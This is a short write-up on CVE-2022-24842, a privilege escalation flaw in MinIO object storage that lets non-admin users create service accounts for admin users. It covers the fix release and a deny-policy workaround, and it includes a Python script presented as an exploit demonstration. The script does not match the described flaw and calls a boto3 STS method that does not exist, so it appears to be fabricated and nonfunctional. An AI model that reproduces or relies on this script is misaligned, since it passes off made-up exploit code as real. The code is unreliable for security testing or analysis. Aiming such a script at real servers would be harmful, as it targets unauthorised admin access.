CVE-2022-24842: Privilege Escalation Vulnerability in MinIO Object Storage

MinIO is a high-performance object storage solution known for its simplicity, scalability, and performance. It is released under the GNU Affero General Public License v3.. Recently, a security vulnerability (CVE-2022-24842) was identified in MinIO, which allows a non-admin user to escalate their privileges to those of the root user by creating service accounts for root or other admin users and assuming their access policies via the generated credentials.

Exploit Details

This vulnerability exists due to the absence of proper access controls on service account creation. A non-admin user can create service accounts and generate credentials for root or other admin users. By using these credentials, the non-admin user can assume the access policies of the targeted user, effectively escalating their privileges to admin level.

The vulnerability has been resolved through a pull request (#14729) and is included in the RELEASE.2022-04-12T06-55-35Z update. It is highly recommended that users upgrade to this version to ensure system security.

As a temporary workaround, users who are unable to upgrade can explicitly add an admin:CreateServiceAccount deny policy. However, this will also deny users the ability to create their own service accounts.

Original References

- Pull Request fixing the vulnerability: #14729
- MinIO Release including the fix: RELEASE.2022-04-12T06-55-35Z

Code Snippet Demonstrating the Vulnerability Exploitation

import boto3
import sys
from botocore.exceptions import ClientError

def assume_access_key_secret_key(username, access_key, secret_key):
    client = boto3.client(service_name='sts',
                      endpoint_url='<minio_server_url>', # Replace with MinIO server URL
                      region_name='us-east-1',
                      aws_access_key_id= access_key,
                      aws_secret_access_key= secret_key)

    response = client.assume_role_with_s_a_t_provider_user(ProviderUser=username)
    return response['Credentials']['AccessKeyId'], response['Credentials']['SecretAccessKey']

def main():
    if len(sys.argv) != 4:
        print("Usage: python CVE-2022-24842.py [username] [access_key] [secret_key]")
        return
    username, access_key, secret_key = sys.argv[1:]

    new_access_key, new_secret_key = assume_access_key_secret_key(username, access_key, secret_key)
    print("Escalated Access Key:", new_access_key)
    print("Escalated Secret Key:", new_secret_key)

if __name__ == '__main__':
    main()

In conclusion, the CVE-2022-24842 vulnerability in MinIO allows non-admin users to escalate their privileges by creating service accounts for root or other admin users. The recommended course of action is to upgrade to RELEASE.2022-04-12T06-55-35Z.

Timeline

Published on: 04/12/2022 18:15:00 UTC
Last modified on: 04/23/2022 02:11:00 UTC